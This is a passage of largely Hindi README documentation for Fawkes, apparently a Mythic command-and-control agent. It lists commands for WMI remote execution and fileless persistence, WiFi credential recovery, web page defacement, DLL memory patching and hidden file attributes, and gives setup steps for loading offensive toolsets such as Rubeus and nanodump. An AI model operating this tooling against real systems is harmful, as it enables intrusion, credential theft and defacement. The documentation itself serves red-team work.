whoami | `whoami` | वर्तमान उपयोगकर्ता पहचान और सुरक्षा संदर्भ प्रदर्शित करें। विंडोज: उपयोगकर्ता नाम, SID, टोकन प्रकार, अखंडता स्तर, समूह सदस्यता, विशेषाधिकार। लिनक्स: उपयोगकर्ता, UID, GID, समूह, प्रभावी क्षमताएं (डिकोडेड), SELinux/AppArmor संदर्भ, कंटेनर डिटेक्शन. macOS: उपयोगकर्ता, UID, GID, समूह।
wmi | `wmi -action <execute\|query\|process-list\|os-info\|upload\|exec-staged\|check> [-target <host>] [-command <cmd>] [-query <wql>]` | **(केवल विंडोज)** COM API के माध्यम से WMI क्वेरी, प्रक्रिया निर्माण, फ़ाइल अपलोड और स्टेज्ड निष्पादन निष्पादित करें। upload: certutil/PowerShell स्टेजिंग के माध्यम से फ़ाइलें स्थानांतरित करें। exec-staged: ऑटो-क्लीनअप के साथ अपलोड करें फिर निष्पादित करें। `check` WMI पूर्वापेक्षाएँ मान्य करता है (RPC 135, WMI कनेक्टिविटी). MITRE T1047, T1570.
wmi-persist | `wmi-persist -action <install\|remove\|list> -name <id> -trigger <logon\|startup\|interval\|process> -command <exe> [-consumer_type <command\|script>]` | **(केवल विंडोज)** COM API के माध्यम से WMI ईवेंट सब्सक्रिप्शन स्थिरता। CommandLine और ActiveScript (VBScript/JScript) उपभोक्ताओं का समर्थन करता है। फ़ाइल रहित, रिबूट से बचता है। MITRE T1546.003.
wlan-profiles | `wlan-profiles [-name <SSID>]` | सहेजे गए WiFi नेटवर्क प्रोफ़ाइल और क्रेडेंशियल पुनर्प्राप्त करें। विंडोज: WLAN API, लिनक्स: NetworkManager/wpa_supplicant/iwd, macOS: कीचेन. क्रॉस-प्लेटफ़ॉर्म (T1555)।
write-file | `write-file [-action write\|deface] -path <file> -content <text> [-base64 true] [-append true] [-mkdir true] [-confirm DEFACE]` | फ़ाइलों में सामग्री लिखें, या वेब पेज विकृत करें। `write`: बनाएं/ओवरराइट करें/जोड़ें (डिफ़ॉल्ट). `deface`: विकृति संदेश के साथ वेब सामग्री बदलें (T1491, सुरक्षा गेट). क्रॉस-प्लेटफ़ॉर्म (T1105, T1491)।
write-memory | `write-memory <dll_name> <function_name> <start_index> <hex_bytes>` | **(केवल विंडोज)** एक DLL फ़ंक्शन पते पर बाइट्स लिखें।
xattr | `xattr -action <list\|get\|set\|delete> -path <file> [-name <attr>] [-value <data>] [-hex true]` | **(लिनक्स/मैकओएस केवल)** विस्तारित फ़ाइल विशेषताएँ प्रबंधित करें — सूचीबद्ध करें, प्राप्त करें, सेट करें, हटाएं। डेटा छिपाने के लिए विंडोज ADS के यूनिक्स पूरक (T1564.004)।## Forge Command Augmentation
Fawkes [Mythic Forge](https://github.com/MythicAgents/forge) कमांड वृद्धि का समर्थन करता है, जो एजेंट की क्षमताओं को बाहरी टूल संग्रहों के साथ गतिशील रूप से विस्तारित करता है। जब Forge को Mythic के साथ स्थापित किया जाता है, तो Fawkes कॉलबैक के लिए Mythic UI में अतिरिक्त कमांड स्वचालित रूप से दिखाई देते हैं — एजेंट पुनर्निर्माण की आवश्यकता नहीं है।
**समर्थित टूल संग्रह:**
| संग्रह | प्रकार | निष्पादन माध्यम | उदाहरण |
|------------|------|-------------|----------|
| [SharpCollection](https://github.com/Flangvik/SharpCollection) | .NET असेंबलियाँ | `inline-assembly` | Seatbelt, SharpUp, Rubeus, Certify, SharpHound, SharpDPAPI |
| [Sliver Armory](https://github.com/MythicAgents/forge) | BOF/COFF फ़ाइलें | `inline-execute` | SA-whoami, SA-adcs-enum, SA-ldapsearch, SA-nanodump |
### सेटअप (नई स्थापना)
**चरण 1: Forge स्थापित करें**```bash
cd /path/to/Mythic
sudo ./mythic-cli install github https://github.com/MythicAgents/forge
चरण 2: Forge की payload type support में Fawkes जोड़ें
InstalledServices/forge/payload_type_support.json को संपादित करें और JSON array में Fawkes प्रविष्टि जोड़ें:```json
{
"agent": "fawkes",
"bof_command": "inline-execute",
"bof_file_parameter_name": "bof_file",
"bof_argument_array_parameter_name": "coff_arguments",
"bof_entrypoint_parameter_name": "function_name",
"inline_assembly_command": "inline-assembly",
"inline_assembly_file_parameter_name": "assembly_file",
"inline_assembly_argument_parameter_name": "assembly_arguments",
"execute_assembly_command": "",
"execute_assembly_file_parameter_name": "",
"execute_assembly_argument_parameter_name": "",
"assembly_default_execution_method": "inline_assembly"
}